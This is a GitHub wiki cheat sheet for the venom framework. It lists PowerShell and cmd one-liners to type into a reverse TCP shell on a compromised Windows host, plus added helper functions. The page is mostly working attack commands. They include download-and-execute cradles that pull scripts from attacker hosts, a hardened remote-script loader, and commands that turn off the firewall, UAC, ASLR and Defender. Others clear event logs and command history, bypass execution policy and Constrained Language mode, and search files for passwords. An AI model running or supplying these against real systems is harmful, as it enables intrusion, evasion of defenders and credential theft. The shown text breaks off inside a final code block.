
CmdLine & Scripts for reverse TCP shell addicts

pedro ubuntu edited this page Feb 2, 2021 · 172 revisions


:octocat: Description

This wiki describes some of the command lines and scripts that can be executed directly in our reverse TCP shell prompt
to help pentesters (red teams) with their enumeration tasks, or to perform simple remote-host shell functions (one-liners).
Every entry states the privilege level it needs (🚶 UserLand or 🔑 Administrator), the interpreter it is typed into, and, where one is used, the LolBin it relies on.
The Venom v1.0.17.7 release replaced the xterm terminal with gnome-terminal because xterm offers no convenient clipboard copy/paste.



:octocat: Wiki Jump Links

[1] - Enumeration
[2] - NetWork
[3] - FileSystem
[4] - Credentials
[5] - Auxiliary-Modules



:octocat: Enumeration

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Target host enumeration | 🚶 UserLand | cmd or powershell | systeminfo |

```powershell
systeminfo|findstr "Host OS Type"
```

| Description | Privileges | Interpreter |
|---|---|---|
| Get current username | 🚶 UserLand | powershell |

```powershell
# whoami ignores stdin, so run both commands instead of piping one into the other
$Env:USERNAME; whoami
```

| Description | Privileges | Interpreter |
|---|---|---|
| List host accounts | 🚶 UserLand | powershell |

```powershell
Get-LocalUser|Select-Object Name,Enabled,Description
```

| Description | Privileges | Interpreter |
|---|---|---|
| List last logon | 🚶 UserLand | powershell |

```powershell
Get-LocalUser|ft Name,Enabled,LastLogon
```

| Description | Privileges | Interpreter |
|---|---|---|
| Get current process PID | 🚶 UserLand | powershell |

```powershell
$pid
```

| Description | Privileges | Interpreter |
|---|---|---|
| Get current process name and path | 🚶 UserLand | powershell |

```powershell
(Get-Process -Id $PID)|Select-Object Id,Name,Path
```

| Description | Privileges | Interpreter | Storage |
|---|---|---|---|
| Capture desktop screenshot and save to TMP (fileless) | 🚶 UserLand | powershell | Fileless + $Env:TMP (screenshots) |

```powershell
# review the paste first: this executes whatever the URL serves at run time
iex(iwr("https://pastebin.com/raw/L8BVTDV6"))
```

| Description | Privileges | Interpreter | LolBin | Storage |
|---|---|---|---|---|
| Capture screenshots of mouse clicks for 4 seconds | 🚶 UserLand | powershell | psr.exe | $Env:TMP (SHot.zip) |

```powershell
psr.exe /start /output $Env:TMP\SHot.zip /sc 1 /gui 0;Start-Sleep -Seconds 4;psr.exe /stop
```

| Description | Privileges | Interpreter |
|---|---|---|
| List host scheduled tasks | 🚶 UserLand | cmd or powershell |

```powershell
cmd /c schtasks|findstr "Ready Running"
```

| Description | Privileges | Interpreter |
|---|---|---|
| List host processes running | 🚶 UserLand | powershell |

```powershell
Get-Process|Select-Object Name,Path,Company,Product,StartTime
```

| Description | Privileges | Interpreter |
|---|---|---|
| List host processes running (with the services each one hosts) | 🚶 UserLand | cmd or powershell |

```powershell
cmd /c tasklist /SVC
```

| Description | Privileges | Interpreter |
|---|---|---|
| List running services that accept a Stop control (CanStop) | 🚶 UserLand | powershell |

```powershell
Get-Service|Where-Object { $_.Status -eq 'Running' -and $_.CanStop }|Select-Object CanStop,Status,Name,DisplayName
```

| Description | Privileges | Interpreter |
|---|---|---|
| List running services with StartType Automatic | 🚶 UserLand | powershell |

```powershell
Get-Service|Where-Object { $_.Status -eq 'Running' -and $_.StartType -eq 'Automatic' }|Select-Object Status,StartType,Name,DisplayName
```

| Description | Privileges | Interpreter |
|---|---|---|
| Stop remote process(es) by file name | 🚶 UserLand | cmd or powershell |

```powershell
cmd /c Taskkill /F /IM Python.exe
```

| Description | Privileges | Interpreter |
|---|---|---|
| Stop remote process by PID | 🚶 UserLand | cmd or powershell |

```powershell
cmd /c Taskkill /F /PID 1234
```

| Description | Privileges | Interpreter |
|---|---|---|
| List host applications installed | 🚶 UserLand | powershell |

```powershell
# query both hives: the native key holds 64-bit applications, Wow6432Node holds 32-bit ones
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*, HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*|Where-Object DisplayName|Select-Object DisplayName, DisplayVersion|Format-Table -AutoSize
```

| Description | Privileges | Interpreter |
|---|---|---|
| List PowerShell history | 🚶 UserLand | powershell |

```powershell
type $Env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```

| Description | Privileges | Interpreter |
|---|---|---|
| Anti-virus enumeration (Defender status) | 🚶 UserLand | powershell |

```powershell
Get-MpComputerStatus
```

| Description | Privileges | Interpreter |
|---|---|---|
| Enumerate Defender protections and exclusions | 🚶 UserLand | powershell |

```powershell
Get-MpPreference
```

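The one-liners above each answer one question. The function below is an added example, not part of venom, that folds the enumeration into a single object you can inspect or export in one round trip through the shell. It assumes Windows PowerShell 5.1 on Windows 10; the Defender cmdlets and the local-accounts module are treated as optional because hardened hosts or third-party AV may lack them, and the output path under `$env:TMP` is a placeholder.

```powershell
# Added example (not venom's code): one-shot host triage combining the enumeration one-liners.
# Assumptions: Windows PowerShell 5.1, Windows 10; Get-MpComputerStatus and
# Get-LocalGroupMember may be missing, so both are optional.
function Get-HostTriage {
    [CmdletBinding()]
    param()

    $identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($identity)
    # IsInRole(Administrator) is false for a non-elevated admin (UAC split token);
    # a plain match on S-1-5-32-544 in $identity.Groups would report that shell as admin.
    $elevated  = $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)

    $os = Get-CimInstance Win32_OperatingSystem

    # Installed software lives in the native hive, the WOW6432Node hive and the
    # per-user hive; querying only Wow6432Node misses every 64-bit application.
    $uninstallKeys = @(
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*'
    )
    $apps = Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName } |
        Select-Object DisplayName, DisplayVersion, Publisher |
        Sort-Object DisplayName -Unique

    # Running services that accept a Stop control: worth knowing once a service
    # binary or its directory turns out to be writable later on.
    $stoppable = Get-Service | Where-Object { $_.Status -eq 'Running' -and $_.CanStop } |
        Select-Object Name, DisplayName, StartType

    # Defender status is optional: the cmdlet is absent where Defender is not installed.
    $defender = $null
    if (Get-Command Get-MpComputerStatus -ErrorAction SilentlyContinue) {
        $defender = Get-MpComputerStatus -ErrorAction SilentlyContinue |
            Select-Object AntivirusEnabled, RealTimeProtectionEnabled, IsTamperProtected, AMProductVersion
    }

    $localAdmins = try {
        Get-LocalGroupMember -Group 'Administrators' -ErrorAction Stop | Select-Object -ExpandProperty Name
    } catch { @() }

    [PSCustomObject]@{
        Hostname          = $env:COMPUTERNAME
        OS                = "$($os.Caption) $($os.Version) ($($os.OSArchitecture))"
        LastBoot          = $os.LastBootUpTime
        User              = $identity.Name
        Elevated          = $elevated
        LanguageMode      = $ExecutionContext.SessionState.LanguageMode
        LocalAdmins       = $localAdmins
        StoppableServices = $stoppable
        InstalledApps     = $apps
        Defender          = $defender
    }
}

# Usage: collect once, then drill into the nested properties or export the whole object.
$triage = Get-HostTriage
$triage | Select-Object Hostname, OS, User, Elevated, LanguageMode | Format-List
$triage.InstalledApps | Format-Table -AutoSize
$triage | ConvertTo-Json -Depth 4 | Set-Content "$env:TMP\triage.json"   # placeholder path
```

The JSON export is the only thing that touches disk; drop that line if the engagement calls for a fileless footprint, and remember that `Get-Command Get-MpComputerStatus` returning nothing is itself a useful finding (no Defender, so look for a third-party product in the service list).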
[^] - Jump to Top


:octocat: NetWork

| Description | Privileges | Interpreter |
|---|---|---|
| List established connections | 🚶 UserLand | cmd or powershell |

```powershell
cmd /c netstat -ano|findstr "ESTABLISHED"
```

| Description | Privileges | Interpreter |
|---|---|---|
| List established connections | 🚶 UserLand | powershell |

```powershell
Get-NetTcpConnection -State "Established"|Format-Table -AutoSize
```

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Start the Firefox browser on a selected URL | 🚶 UserLand | cmd or powershell | firefox.exe |

```powershell
cmd /c start firefox.exe https://www.bing.com/search?q=hacking
```

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Start a web server in the current directory (python must exist on the target) | 🚶 UserLand | cmd or powershell | python.exe |

```powershell
python -m http.server --bind 192.168.1.72 8080
```

| Description | Privileges | Interpreter | Storage |
|---|---|---|---|
| Download cmdlet to target machine and execute (fileless) | 🚶 UserLand | powershell | Fileless |

```powershell
iex(iwr("http://192.168.1.72/webserver.ps1"))
```

| Description | Privileges | Interpreter | Storage |
|---|---|---|---|
| Download cmdlet to target machine | 🚶 UserLand | powershell | $Env:TMP |

```powershell
iwr -Uri http://192.168.1.72/webserver.ps1 -OutFile $env:tmp\webserver.ps1
```

| Description | Privileges | Interpreter | LolBin | Storage |
|---|---|---|---|---|
| Download cmdlet to target machine and execute (fileless) | 🚶 UserLand | powershell | Msxml2.XMLHTTP | Fileless |

```powershell
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
```

| Description | Privileges | Interpreter |
|---|---|---|
| List target host interfaces | 🚶 UserLand | powershell |

```powershell
Get-NetIPConfiguration|ft InterfaceAlias,InterfaceDescription,IPv4Address
```

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Fetch HTTP headers | 🚶 UserLand | cmd or powershell | curl.exe |

```powershell
cmd /c curl --head "https://example.com"
```

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| List contents of a remote FTP directory (`--list-only` applies to FTP/SFTP listings, not HTTP) | 🚶 UserLand | cmd or powershell | curl.exe |

```powershell
cmd /c curl --list-only "ftp://example.com/foo/"
```

| Description | Privileges | Interpreter |
|---|---|---|
| List host DNS cache entries | 🚶 UserLand | cmd or powershell |

```powershell
cmd /c ipconfig /displaydns|findstr /C:"Record Name" /C:"A (Host) Record"
```

| Description | Privileges | Interpreter |
|---|---|---|
| List host DNS cache entries | 🚶 UserLand | Wmi + powershell |

```powershell
Get-WmiObject -query "Select * from MSFT_DNSClientCache" -Namespace "root\standardcimv2" -ErrorAction stop|Select-Object Entry,Name,Data|Format-Table -Wrap|Out-String
```

| Description | Privileges | Interpreter |
|---|---|---|
| List host DNS cache entries | 🚶 UserLand | powershell |

```powershell
Get-DNSClientCache|Select-Object Entry,Data|Format-Table -AutoSize
```

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Show firewall state and policy for all profiles (not the rule list) | 🚶 UserLand | cmd or powershell | netsh.exe |

```powershell
cmd /c netsh advfirewall show allprofiles
```

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Show firewall state and policy for the active profile | 🚶 UserLand | cmd or powershell | netsh.exe |

```powershell
cmd /c netsh advfirewall show currentprofile
```

| Description | Privileges | Interpreter |
|---|---|---|
| List firewall rules | 🚶 UserLand | powershell |

```powershell
Get-NetFirewallRule -All
```

| Description | Privileges | Interpreter |
|---|---|---|
| Filter firewall rules by display name | 🚶 UserLand | powershell |

```powershell
Get-NetFirewallRule|Where-Object { $_.DisplayName -like '*python*' }|Select-Object DisplayName,Description,Enabled,Profile,Direction,Action|Format-Table -AutoSize
```

| Description | Privileges | Interpreter |
|---|---|---|
| List SMB shares | 🚶 UserLand | powershell |

```powershell
Get-SmbShare|Select-Object Name,Path,Description
```

| Description | Privileges | Interpreter |
|---|---|---|
| Get browser User-Agent | 🚶 UserLand | powershell |

```powershell
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\internet settings" -Name 'User Agent' -ErrorAction SilentlyContinue|Select-Object 'User Agent'
```

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Stop remote firewall | 🔑 Administrator | cmd or powershell | netsh.exe |

```powershell
cmd /c netsh advfirewall set allprofiles state off
```

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Start remote firewall | 🔑 Administrator | cmd or powershell | netsh.exe |

```powershell
cmd /c netsh advfirewall set allprofiles state on
```

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Add a port rule to the firewall | 🔑 Administrator | cmd or powershell | netsh.exe |

```powershell
cmd /c netsh advfirewall firewall add rule name="Mine Webserver" dir=in action=allow protocol=TCP localport=8080
```

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Add a program rule to the firewall (adjust the python path to the target's install) | 🔑 Administrator | cmd or powershell | netsh.exe |

```powershell
netsh advfirewall firewall add rule name="Mine Webserver" description="venom v1.0.17 - python (SE) webserver" program="$Env:LOCALAPPDATA\Programs\python.exe" dir=in action=allow protocol=TCP enable=yes
```

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Delete rule from firewall | 🔑 Administrator | cmd or powershell | netsh.exe |

```powershell
cmd /c netsh advfirewall firewall delete rule name="Mine Webserver"
```

| Description | Privileges | Interpreter |
|---|---|---|
| Delete rule from firewall | 🔑 Administrator | powershell |

```powershell
Remove-NetFirewallRule -DisplayName "Mine Webserver"
```

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Review a firewall rule by name | 🔑 Administrator | cmd or powershell | netsh.exe |

```powershell
netsh advfirewall firewall show rule name="Mine Webserver"
```

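The three download-and-execute entries above (`iwr`, `iwr -OutFile`, `Msxml2.XMLHTTP`) all hand whatever the staging server returns straight to `iex`. The function below is an added example, not venom's code, that tries the same transports in turn (plus `System.Net.WebClient` with the system proxy, which matters on corporate networks) and refuses to execute the script unless its SHA-256 matches a value pinned on the attacker side, so a tampered staging host or an interception proxy cannot feed the shell arbitrary code. The URL, file name and hash in the usage note are placeholders; it assumes the script is saved as UTF-8 without BOM so that the bytes hashed on both sides are identical.

```powershell
# Added example (not venom's code): in-memory download with transport fallback and
# a SHA-256 pin checked before Invoke-Expression. URL/hash below are placeholders.
function Invoke-PinnedScript {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$Sha256,   # expected hex digest, case-insensitive
        [switch]$UseProxy                         # honour the user's WinINET proxy settings
    )

    $body   = $null
    $errors = @()

    # Transport 1: Invoke-WebRequest. -UseBasicParsing skips the IE HTML parser on
    # Windows PowerShell 5.1 (which can hang when IE first-run setup is pending).
    # With a non-text Content-Type (e.g. octet-stream from python http.server) .Content is byte[].
    try {
        $resp = Invoke-WebRequest -Uri $Url -UseBasicParsing -ErrorAction Stop
        $body = if ($resp.Content -is [byte[]]) { [System.Text.Encoding]::UTF8.GetString($resp.Content) } else { $resp.Content }
    } catch { $errors += "iwr: $($_.Exception.Message)" }

    # Transport 2: System.Net.WebClient, optionally through the system proxy.
    if (-not $body) {
        try {
            $wc = New-Object System.Net.WebClient
            if ($UseProxy) {
                $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
                $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
            }
            $body = $wc.DownloadString($Url)
        } catch { $errors += "WebClient: $($_.Exception.Message)" }
    }

    # Transport 3: the Msxml2.XMLHTTP COM object, as in the table above.
    if (-not $body) {
        try {
            $h = New-Object -ComObject Msxml2.XMLHTTP
            $h.open('GET', $Url, $false)
            $h.send()
            if ($h.status -eq 200) { $body = $h.responseText } else { $errors += "XMLHTTP: HTTP $($h.status)" }
        } catch { $errors += "XMLHTTP: $($_.Exception.Message)" }
    }

    if (-not $body) { throw "download failed:`n$($errors -join "`n")" }

    # Hash exactly the bytes that will be executed and compare with the pin
    # before anything reaches Invoke-Expression.
    $bytes  = [System.Text.Encoding]::UTF8.GetBytes($body)
    $sha    = [System.Security.Cryptography.SHA256]::Create()
    $actual = ($sha.ComputeHash($bytes) | ForEach-Object { $_.ToString('x2') }) -join ''
    if ($actual -ne $Sha256.ToLower()) {
        throw "hash mismatch for $Url : expected $Sha256, got $actual (not executing)"
    }

    Invoke-Expression $body
}

# Usage: compute the pin on the attacker box first
#   (Get-FileHash .\webserver.ps1 -Algorithm SHA256).Hash
# then in the target shell (placeholder URL and digest):
#   Invoke-PinnedScript -Url 'http://192.168.1.72/webserver.ps1' -Sha256 '<hex digest>' -UseProxy
```

The pin also doubles as a change detector: if the staging server is still serving the file you uploaded, the hash matches; a mismatch means the transport mangled the bytes (wrong charset, BOM, CRLF rewrite) or somebody else is answering on that URL, and in either case running the content blind is the wrong move.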
[^] - Jump to Top


:octocat: FileSystem

| Description | Privileges | Interpreter |
|---|---|---|
| Print working directory | 🚶 UserLand | cmd or powershell |

```powershell
pwd
```

| Description | Privileges | Interpreter |
|---|---|---|
| Hide a file with the 'hidden' and 'system' attributes | 🚶 UserLand | cmd or powershell |

```powershell
cmd /c attrib +H +S C:\path\to\your\file.doc
```

| Description | Privileges | Interpreter |
|---|---|---|
| Un-hide a file (clear the 'hidden' and 'system' attributes) | 🚶 UserLand | cmd or powershell |

```powershell
cmd /c attrib -H -S C:\path\to\your\file.doc
```

| Description | Privileges | Interpreter |
|---|---|---|
| List hidden files recursively | 🚶 UserLand | cmd or powershell |

```powershell
cmd /c dir %USERPROFILE% /A:H /S /B
```

| Description | Privileges | Interpreter |
|---|---|---|
| List ADS (Alternate Data Streams) entries | 🚶 UserLand | cmd or powershell |

```powershell
cmd /c dir /r
```

| Description | Privileges | Interpreter |
|---|---|---|
| List all event logs | 🚶 UserLand | powershell |

```powershell
# Get-EventLog exists in Windows PowerShell 5.1 only; on PowerShell 7 use Get-WinEvent -ListLog *
Get-EventLog -List
```

| Description | Privileges | Interpreter |
|---|---|---|
| Read FileName.txt text file on the terminal (PS) | 🚶 UserLand | powershell |

```powershell
Get-Content FileName.txt
```

| Description | Privileges | Interpreter |
|---|---|---|
| Read FileName.txt text file on the terminal (cmd) | 🚶 UserLand | cmd or powershell |

```powershell
cmd /c type FileName.txt
```

| Description | Privileges | Interpreter |
|---|---|---|
| List startup entries | 🚶 UserLand | powershell |

```powershell
Get-CimInstance Win32_StartupCommand|Select-Object Name,Command,Location,User
```

| Description | Privileges | Interpreter |
|---|---|---|
| List last 10 System event log entries | 🚶 UserLand | powershell |

```powershell
Get-EventLog -LogName "System" -newest 10
```

| Description | Privileges | Interpreter |
|---|---|---|
| List last 10 Security event log entries | 🔑 Administrator | powershell |

```powershell
Get-EventLog -LogName "Security" -newest 10
```

| Description | Privileges | Interpreter |
|---|---|---|
| List last 10 Windows PowerShell event log entries | 🚶 UserLand | powershell |

```powershell
Get-EventLog -LogName "Windows Powershell" -newest 10
```

| Description | Privileges | Interpreter |
|---|---|---|
| List installed software (by Program Files directories) | 🚶 UserLand | powershell |

```powershell
Get-ChildItem "C:\Program Files", "C:\Program Files (x86)"|ft Parent,Name,LastWriteTime
```

| Description | Privileges | Interpreter |
|---|---|---|
| Restart remote PC in 10 seconds (`/s` instead of `/r` powers it off) | 🚶 UserLand | cmd or powershell |

```powershell
cmd /R shutdown /r /c "my shutdown msg" /t 10
```

| Description | Privileges | Interpreter |
|---|---|---|
| List Recycle Bin entries | 🚶 UserLand | powershell |

```powershell
$shell = New-Object -com shell.application;$rb = $shell.Namespace(10);$rb.Items()
```

| Description | Privileges | Interpreter |
|---|---|---|
| List host drives available | 🚶 UserLand | powershell |

```powershell
Get-PSDrive -PSProvider 'FileSystem'|Select-Object Name,Used,Free,Root|Format-Table
```

| Description | Privileges | Interpreter |
|---|---|---|
| Hide drives from Explorer (HKCU policy: affects the current user only, no admin needed) | 🚶 UserLand | cmd or powershell |

```powershell
cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe
```

| Description | Privileges | Interpreter |
|---|---|---|
| Show drives in Explorer again | 🚶 UserLand | powershell |

```powershell
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\Explorer' -Name 'NoDrives' -Force;cmd /c taskkill /F /IM explorer.exe;start explorer.exe
```

| Description | Privileges | Interpreter |
|---|---|---|
| Clear Windows event logs | 🔑 Administrator | powershell |

```powershell
# clearing writes Security event 1102 / System event 104 ("log was cleared"), which SOCs alert on
wevtutil el|Foreach-Object {wevtutil cl "$_"}
```

| Description | Privileges | Interpreter |
|---|---|---|
| Disable remote UAC (takes effect after the next reboot) | 🔑 Administrator | powershell |

```powershell
Set-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\system' -Name 'EnableLUA' -Value 0 -Force
```

| Description | Privileges | Interpreter |
|---|---|---|
| Disable remote ASLR | 🔑 Administrator | powershell |

```powershell
# MoveImages is documented for older releases (Vista/7); Windows 10 manages ASLR through Exploit Protection (Get-/Set-ProcessMitigation)
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management' -Name 'MoveImages' -Value 0 -Force
```

| Description | Privileges | Interpreter |
|---|---|---|
| Disable Task Manager (HKCU policy: current user only, no admin needed) | 🚶 UserLand | cmd or powershell |

```powershell
cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t REG_DWORD /d 1 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe
```

| Description | Privileges | Interpreter |
|---|---|---|
| Enable Task Manager | 🚶 UserLand | cmd or powershell |

```powershell
cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t REG_DWORD /d 0 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe
```

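`dir /r` above prints alternate data streams one directory at a time and leaves you to scroll for the interesting ones. The functions below are an added example, not venom's code, that do the same job through the FileSystem provider: walk a tree, report every stream except the default `:$DATA` (optionally skipping the ubiquitous `Zone.Identifier` mark-of-the-web stream), and read a chosen stream back. They assume an NTFS volume; the demo file under `$env:TMP` is constructed by the block itself and removed at the end.

```powershell
# Added example (not venom's code): recursive ADS enumeration with Get-Item -Stream.
# Assumptions: NTFS volume; the demo file path under $env:TMP is a placeholder.
function Get-AlternateStreams {
    param(
        [string]$Path = $env:USERPROFILE,
        [switch]$IncludeZoneIdentifier   # Zone.Identifier (mark-of-the-web) is on most downloads; hide it by default
    )
    Get-ChildItem -Path $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # -Stream * lists every stream of the file; ':$DATA' is the normal file content
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                Where-Object { $IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier' } |
                ForEach-Object {
                    [PSCustomObject]@{
                        File   = $file.FullName
                        Stream = $_.Stream
                        Length = $_.Length
                    }
                }
        }
}

# Read one stream's content (e.g. the ZoneId/ReferrerUrl a browser wrote into Zone.Identifier).
function Get-StreamContent {
    param(
        [Parameter(Mandatory)][string]$File,
        [Parameter(Mandatory)][string]$Stream
    )
    Get-Content -LiteralPath $File -Stream $Stream -Raw
}

# Usage (constructed demo): plant a stream, find it, read it, clean up.
$demo = Join-Path $env:TMP 'ads-demo.txt'
Set-Content -LiteralPath $demo -Value 'visible content'
Set-Content -LiteralPath $demo -Stream 'hidden.txt' -Value 'payload in a stream'
Get-AlternateStreams -Path $env:TMP | Where-Object File -eq $demo | Format-Table -AutoSize
Get-StreamContent -File $demo -Stream 'hidden.txt'
Remove-Item -LiteralPath $demo -Force
```

Run `Get-AlternateStreams -Path C:\Users -IncludeZoneIdentifier` when you want the mark-of-the-web records too: the `ReferrerUrl`/`HostUrl` fields inside `Zone.Identifier` tell you where a file came from, which is as useful for tracing how a foothold was staged as it is for finding what a user downloaded.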
[^] - Jump to Top


:octocat: Credentials

| Description | Privileges | Interpreter |
|---|---|---|
| List user token privileges | 🚶 UserLand | cmd or powershell |

```powershell
whoami /priv
```

| Description | Privileges | Interpreter |
|---|---|---|
| List stored credentials | 🚶 UserLand | cmd or powershell |

```powershell
cmdkey /list
```

| Description | Privileges | Interpreter |
|---|---|---|
| Verify whether you are in Constrained Language mode | 🚶 UserLand | powershell |

```powershell
$ExecutionContext.SessionState.LanguageMode
```

| Description | Privileges | Interpreter |
|---|---|---|
| List local users with their SID | 🚶 UserLand | powershell |

```powershell
Get-LocalUser|Select-Object -Property Name,SID,Enabled,PasswordRequired,LastLogon|ft
```

| Description | Privileges | Interpreter | LolBin | Author |
|---|---|---|---|---|
| Find missing software patches for privilege escalation | 🚶 UserLand | powershell | iwr | @rasta-mouse |

```powershell
# load the script first, then call the function it defines; Sherlock's KB list is dated (its author superseded it with Watson)
iex(iwr https://raw.githubusercontent.com/r00t-3xp10it/venom/master/aux/sherlock.ps1); Find-AllVulns
```

| Description | Privileges | Interpreter |
|---|---|---|
| List host folder permissions | 🚶 UserLand | powershell |

```powershell
Get-Acl $Env:PROGRAMFILES
```

| Description | Privileges | Interpreter |
|---|---|---|
| List host folder permissions | 🚶 UserLand | cmd |

```cmd
icacls "%PROGRAMFILES%"
```

| Description | Privileges | Interpreter |
|---|---|---|
| List folders with 'Everyone' permissions | 🚶 UserLand | powershell |

```powershell
Get-ChildItem "C:\Program Files", "C:\Program Files (x86)" -Directory -ErrorAction SilentlyContinue|ForEach-Object { try { Get-Acl $_.FullName -ErrorAction SilentlyContinue|Where-Object { ($_.Access|Select-Object -ExpandProperty IdentityReference) -match "Everyone" } } catch {} }
```

| Description | Privileges | Interpreter |
|---|---|---|
| List host unquoted service paths | 🚶 UserLand | powershell |

```powershell
# unquoted AND containing a space before the .exe; arguments after the .exe are ignored
gwmi -class Win32_Service -Property Name,DisplayName,PathName,StartMode|Where-Object {$_.StartMode -eq "Auto" -and $_.PathName -NotLike "C:\Windows\*" -and $_.PathName -notmatch '^"' -and (($_.PathName -split '\.exe',2)[0] -match '\s')}|Select-Object PathName,Name
```

| Description | Privileges | Interpreter |
|---|---|---|
| List folders with weak permissions (recursive, no temp file) | 🚶 UserLand | cmd + powershell |

```powershell
# (F)=full, (M)=modify, (W)=write granted to Everyone; dumps the full ACL listing when any is found
$acls = icacls "$env:ProgramFiles\*" 2>$null;if($acls|Select-String 'Everyone:.*\((F|M|W)\)'){$acls}else{"[i] No weak Everyone ACLs found .."}
```

| Description | Privileges | Interpreter |
|---|---|---|
| Search for abusable token privileges (Potato family needs SeImpersonate or SeAssignPrimaryToken) | 🚶 UserLand | cmd + powershell |

```powershell
# a privilege shown as Disabled is still present on the token and can be enabled by the process, so match on presence, not on "Enabled"
$privs = whoami /priv|findstr /I /C:"SeImpersonatePrivilege" /C:"SeAssignPrimaryTokenPrivilege" /C:"SeTcbPrivilege" /C:"SeBackupPrivilege" /C:"SeRestorePrivilege" /C:"SeCreateTokenPrivilege" /C:"SeLoadDriverPrivilege" /C:"SeTakeOwnershipPrivilege" /C:"SeDebugPrivilege";If($privs){"[i] Abusable token privileges found ..`n";$privs}Else{"[i] No abusable token privileges found on current token .."}
```

| Description | Privileges | Interpreter |
|---|---|---|
| Check whether the reverse TCP shell is elevated | 🚶 UserLand | powershell |

```powershell
# IsInRole(Administrator) is false for a non-elevated admin (UAC split token); a plain match on S-1-5-32-544 in the group list would report it as admin
$IsClientAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator);If($IsClientAdmin){"[i] Running under Administrator privileges (elevated) .."}Else{"[i] Running under UserLand privileges .."}
```

| Description | Privileges | Interpreter |
|---|---|---|
| Search for passwords inside text (.txt) or log (.log) files recursively | 🚶 UserLand | cmd + powershell |

```powershell
# findstr treats space-separated words as alternatives, so one pass covers both terms; no temp file needed
Set-Location $Env:USERPROFILE; findstr /S /I /N "passw login" *.txt *.log
```

| Description | Privileges | Interpreter |
|---|---|---|
| PowerShell Constrained Language bypass (needs the .NET Framework 2.0/3.5 optional feature, absent on a default Windows 10 install) | 🚶 UserLand | powershell |

```powershell
powershell -v 2 -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
```

| Description | Privileges | Interpreter |
|---|---|---|
| Disable Defender real-time monitoring | 🔑 Administrator | powershell |

```powershell
# needs an elevated shell, and is silently ignored while Tamper Protection is on (Windows 10 1903+)
Set-MpPreference -DisableRealtimeMonitoring $True; Get-MpComputerStatus
Set-MpPreference -DisableIOAVProtection $true
```

| Description | Privileges | Interpreter |
|---|---|---|
| Disable PowerShell command logging for the current session (open shell) | 🚶 UserLand | powershell |

```powershell
Set-PSReadlineOption -HistorySaveStyle SaveNothing
```

| Description | Privileges | Interpreter |
|---|---|---|
| List PSReadLine options | 🚶 UserLand | powershell |

```powershell
Get-PSReadlineOption
```

| Description | Privileges | Interpreter |
|---|---|---|
| Clear PowerShell command history file | 🚶 UserLand | powershell |

```powershell
$CleanTracks = (Get-PSReadlineOption).HistorySavePath;Clear-Content $CleanTracks
```

| Description | Privileges | Interpreter |
|---|---|---|
| List execution policy | 🚶 UserLand | powershell |

```powershell
Get-ExecutionPolicy -List
```

| Description | Privileges | Interpreter |
|---|---|---|
| Change execution policy for this session | 🚶 UserLand | powershell |

```powershell
Set-ExecutionPolicy Bypass -Scope Process
```

| Description | Privileges | Interpreter |
|---|---|---|
| Change execution policy (silent) | 🚶 UserLand | cmd or powershell |

```powershell
cmd /R echo Y | powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser
```

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| List security updates installed | 🚶 UserLand | cmd or powershell | Wmic |

```powershell
# wmic is deprecated and removed from recent Windows 11 builds; Get-HotFix is the PowerShell equivalent
wmic qfe get Hotfixid,installedon,description,installedby
```

| Description | Operating system |
|---|---|
| World-writable folders by default | Windows 10 1803 |

```
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
